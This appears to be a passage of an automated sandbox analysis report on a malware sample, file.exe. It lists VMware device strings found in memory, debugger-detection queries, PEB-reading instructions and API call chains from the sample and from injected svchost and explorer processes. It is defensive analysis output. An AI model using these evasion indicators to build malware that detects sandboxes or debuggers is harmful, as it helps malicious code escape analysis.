          Source: explorer.exe, 0000000E.00000003.2816895815.000000000CA63000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000003.2818462375.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}9%
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007A34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 0000000E.00000003.2816895815.000000000CA72000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.2695744148.0000000009660000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 0000000E.00000003.2809741840.000000000C93C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000&
          Source: explorer.exe, 0000000E.00000003.2839857890.000000000C93C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D: ]
          Source: explorer.exe, 0000000E.00000002.2920536485.00000000079D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NXTYSTEVMWare
          Source: explorer.exe, 0000000E.00000002.2976289585.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.2696706638.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 0000000E.00000003.2818462375.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\d%
          Source: explorer.exe, 0000000E.00000003.2839857890.000000000C9A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NECVMWarVMware SATA CD001.00
          Source: explorer.exe, 00000002.00000002.2686435138.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 0000000E.00000003.2842463004.000000000C85B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}eid
          Source: explorer.exe, 0000000E.00000003.2818462375.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8$
          Source: explorer.exe, 0000000E.00000002.3020099476.000000000C93C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000'[
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
          Source: explorer.exe, 0000000E.00000003.2817380895.000000000C93C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_0
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
          Source: explorer.exe, 00000002.00000000.1660518211.00000000078A0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000002.00000002.2695744148.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000002.00000002.2696706638.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 0000000E.00000003.2756647360.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}e\
          Source: explorer.exe, 0000000E.00000003.2809741840.000000000C93C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&0000008@v
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000002.2915536056.00000000010B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-92600
          Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-92961
          Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
          Source: C:\Windows\explorer.exe | Process queried: DebugPort
          Source: C:\Windows\explorer.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F7096E rdtsc | 1_2_02F7096E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72AD0 NtReadFile,LdrInitializeThunk | 1_2_02F72AD0
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F16AAF BlockInput | 0_2_00F16AAF
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW | 0_2_00EC3D19
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW | 0_2_00EF3920
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDE01E LoadLibraryA,GetProcAddress | 0_2_00EDE01E
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0116D6A0 mov eax, dword ptr fs:[00000030h] | 0_2_0116D6A0
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0116ED40 mov eax, dword ptr fs:[00000030h] | 0_2_0116ED40
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0116ECE0 mov eax, dword ptr fs:[00000030h] | 0_2_0116ECE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h] | 1_2_02F402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]1_2_02FC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2826B mov eax, dword ptr fs:[00000030h]1_2_02F2826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A250 mov eax, dword ptr fs:[00000030h]1_2_02F2A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36259 mov eax, dword ptr fs:[00000030h]1_2_02F36259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov eax, dword ptr fs:[00000030h]1_2_02FB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov ecx, dword ptr fs:[00000030h]1_2_02FB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2823B mov eax, dword ptr fs:[00000030h]1_2_02F2823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F663FF mov eax, dword ptr fs:[00000030h]1_2_02F663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]1_2_02FDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC3CD mov eax, dword ptr fs:[00000030h]1_2_02FEC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB63C0 mov eax, dword ptr fs:[00000030h]1_2_02FB63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD437C mov eax, dword ptr fs:[00000030h]1_2_02FD437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov ecx, dword ptr fs:[00000030h]1_2_02FB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA352 mov eax, dword ptr fs:[00000030h]1_2_02FFA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8350 mov ecx, dword ptr fs:[00000030h]1_2_02FD8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C310 mov ecx, dword ptr fs:[00000030h]1_2_02F2C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50310 mov ecx, dword ptr fs:[00000030h]1_2_02F50310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]1_2_02F2C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F720F0 mov ecx, dword ptr fs:[00000030h]1_2_02F720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_02F2A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F380E9 mov eax, dword ptr fs:[00000030h]1_2_02F380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB60E0 mov eax, dword ptr fs:[00000030h]1_2_02FB60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB20DE mov eax, dword ptr fs:[00000030h]1_2_02FB20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov eax, dword ptr fs:[00000030h]1_2_02FF60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]1_2_02FF60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC80A8 mov eax, dword ptr fs:[00000030h]1_2_02FC80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3208A mov eax, dword ptr fs:[00000030h]1_2_02F3208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C073 mov eax, dword ptr fs:[00000030h]1_2_02F5C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32050 mov eax, dword ptr fs:[00000030h]1_2_02F32050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6050 mov eax, dword ptr fs:[00000030h]1_2_02FB6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6030 mov eax, dword ptr fs:[00000030h]1_2_02FC6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A020 mov eax, dword ptr fs:[00000030h]1_2_02F2A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C020 mov eax, dword ptr fs:[00000030h]1_2_02F2C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030061E5 mov eax, dword ptr fs:[00000030h]1_2_030061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4000 mov ecx, dword ptr fs:[00000030h]1_2_02FB4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F601F8 mov eax, dword ptr fs:[00000030h]1_2_02F601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_02FAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
